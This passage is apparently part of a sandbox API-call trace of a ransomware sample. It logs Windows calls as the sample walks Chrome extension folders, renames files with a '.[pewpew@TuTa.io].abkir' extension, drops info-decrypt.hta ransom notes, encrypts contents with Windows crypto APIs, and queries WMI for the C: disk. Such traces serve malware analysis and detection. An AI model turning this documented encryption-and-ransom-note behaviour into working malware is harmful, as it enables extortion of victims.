Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0212.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0212.347] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da", lpFilePart=0x0) returned 0x89 [0212.347] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", lpFilePart=0x0) returned 0x8a [0212.347] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0212.347] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0212.348] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0212.348] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0212.348] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0212.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0212.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0212.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0212.348] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da", lpFilePart=0x0) returned 0x89 [0212.348] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", lpFilePart=0x0) returned 0x8a [0212.349] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0212.350] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0212.350] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0212.350] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0212.350] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0212.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0212.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0212.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", lpFilePart=0x0) returned 0x97 [0212.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0212.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e928) returned 1 [0212.351] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949e9a4 | out: lpFileInformation=0x949e9a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0212.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e924) returned 1 [0212.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", lpFilePart=0x0) returned 0x97 [0212.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e368, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0212.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e85c) returned 1 [0212.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0212.352] GetFileType (hFile=0x31c) returned 0x1 [0212.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e858) returned 1 [0212.353] GetFileType (hFile=0x31c) returned 0x1 [0212.353] WriteFile (in: hFile=0x31c, lpBuffer=0x37b410c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949e920, lpOverlapped=0x0 | out: lpBuffer=0x37b410c*, lpNumberOfBytesWritten=0x949e920*=0x1000, lpOverlapped=0x0) returned 1 [0212.354] WriteFile (in: hFile=0x31c, lpBuffer=0x37b410c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949e8f4, lpOverlapped=0x0 | out: lpBuffer=0x37b410c*, lpNumberOfBytesWritten=0x949e8f4*=0x55e, lpOverlapped=0x0) returned 1 [0212.355] CloseHandle (hObject=0x31c) returned 1 [0212.355] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", lpFilePart=0x0) returned 0x97 [0212.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e974) returned 1 [0212.355] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x37b5128 | out: lpFileInformation=0x37b5128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0)) returned 1 [0212.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e970) returned 1 [0212.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", lpFilePart=0x0) returned 0x97 [0212.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e8a8) returned 1 [0212.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0212.356] GetFileType (hFile=0x31c) returned 0x1 [0212.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e8a4) returned 1 [0212.356] GetFileType (hFile=0x31c) returned 0x1 [0212.357] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x949e9b0 | out: lpFileSizeHigh=0x949e9b0*=0x0) returned 0xe0 [0212.357] ReadFile (in: hFile=0x31c, lpBuffer=0x37b556c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e95c, lpOverlapped=0x0 | out: lpBuffer=0x37b556c*, lpNumberOfBytesRead=0x949e95c*=0xe0, lpOverlapped=0x0) returned 1 [0212.358] CloseHandle (hObject=0x31c) returned 1 [0212.358] CryptAcquireContextW (in: phProv=0x949e8fc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e8fc*=0xbe0690) returned 1 [0212.359] CryptGenRandom (in: hProv=0xbe0690, dwLen=0x10, pbBuffer=0x37b68c0 | out: pbBuffer=0x37b68c0) returned 1 [0213.040] CryptImportKey (in: hProv=0xbe0690, pbData=0x365beb0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e8cc | out: phKey=0x949e8cc*=0xb7f250) returned 1 [0213.040] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.040] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.040] CryptDuplicateKey (in: hKey=0xb7f250, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e8bc | out: phKey=0x949e8bc*=0xb7f410) returned 1 [0213.040] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.040] CryptSetKeyParam (hKey=0xb7f410, dwParam=0x4, pbData=0x365bf90*=0x1, dwFlags=0x0) returned 1 [0213.041] CryptSetKeyParam (hKey=0xb7f410, dwParam=0x1, pbData=0x365bf5c, dwFlags=0x0) returned 1 [0213.041] CryptEncrypt (in: hKey=0xb7f410, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x365bfa0*, pdwDataLen=0x949e928*=0xf0, dwBufLen=0xf0 | out: pbData=0x365bfa0*, pdwDataLen=0x949e928*=0xf0) returned 1 [0213.041] CryptEncrypt (in: hKey=0xb7f410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x365c0b4*, pdwDataLen=0x949e930*=0x0, dwBufLen=0x10 | out: pbData=0x365c0b4*, pdwDataLen=0x949e930*=0x10) returned 1 [0213.042] CryptDestroyKey (hKey=0xb7f250) returned 1 [0213.042] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0213.043] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0213.043] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", lpFilePart=0x0) returned 0x97 [0213.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e894) returned 1 [0213.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0213.043] GetFileType (hFile=0x208) returned 0x1 [0213.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e890) returned 1 [0213.043] GetFileType (hFile=0x208) returned 0x1 [0213.044] WriteFile (in: hFile=0x208, lpBuffer=0x365c77c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e924, lpOverlapped=0x0 | out: lpBuffer=0x365c77c*, lpNumberOfBytesWritten=0x949e924*=0x20, lpOverlapped=0x0) returned 1 [0213.045] CloseHandle (hObject=0x208) returned 1 [0213.045] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0213.045] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0213.046] CoTaskMemFree (pv=0x66cdfc8) [0213.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0213.046] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8d0 | out: ppv=0x949e8d0*=0xb51e34) returned 0x0 [0213.046] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8c8 | out: pAptType=0x949e8c8*=1) returned 0x0 [0213.046] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8cc | out: ppvObject=0x949e8cc*=0x0) returned 0x80004002 [0213.046] IUnknown:Release (This=0xb51e34) returned 0x1 [0213.047] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e238 | out: ppv=0x949e238*=0x60271a0) returned 0x0 [0213.048] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e450 | out: ppvObject=0x949e450*=0x0) returned 0x80004002 [0213.048] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e464 | out: ppvObject=0x949e464*=0x602a300) returned 0x0 [0213.048] WbemDefPath:IUnknown:Release (This=0x60271a0) returned 0x0 [0213.048] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e084 | out: ppvObject=0x949e084*=0x602a300) returned 0x0 [0213.048] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e040 | out: ppvObject=0x949e040*=0x0) returned 0x80004002 [0213.048] WbemDefPath:IUnknown:AddRef (This=0x602a300) returned 0x3 [0213.048] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d99c | out: ppvObject=0x949d99c*=0x0) returned 0x80004002 [0213.048] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d94c | out: ppvObject=0x949d94c*=0x0) returned 0x80004002 [0213.048] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d958 | out: ppvObject=0x949d958*=0x66ce5b8) returned 0x0 [0213.048] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce5b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d960 | out: pCid=0x949d960*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.048] WbemDefPath:IUnknown:Release (This=0x66ce5b8) returned 0x3 [0213.048] CoGetContextToken (in: pToken=0x949d9b8 | out: pToken=0x949d9b8) returned 0x0 [0213.049] CoGetContextToken (in: pToken=0x949ddc0 | out: pToken=0x949ddc0) returned 0x0 [0213.049] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de50 | out: ppvObject=0x949de50*=0x0) returned 0x80004002 [0213.049] WbemDefPath:IUnknown:Release (This=0x602a300) returned 0x2 [0213.049] WbemDefPath:IUnknown:Release (This=0x602a300) returned 0x1 [0213.049] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0213.049] CoGetContextToken (in: pToken=0x949e6a8 | out: pToken=0x949e6a8) returned 0x0 [0213.049] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x949e778*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e774 | out: ppvObject=0x949e774*=0x602a300) returned 0x0 [0213.049] WbemDefPath:IUnknown:AddRef (This=0x602a300) returned 0x3 [0213.049] WbemDefPath:IUnknown:Release (This=0x602a300) returned 0x2 [0213.049] WbemDefPath:IWbemPath:SetText (This=0x602a300, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a300, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0213.049] 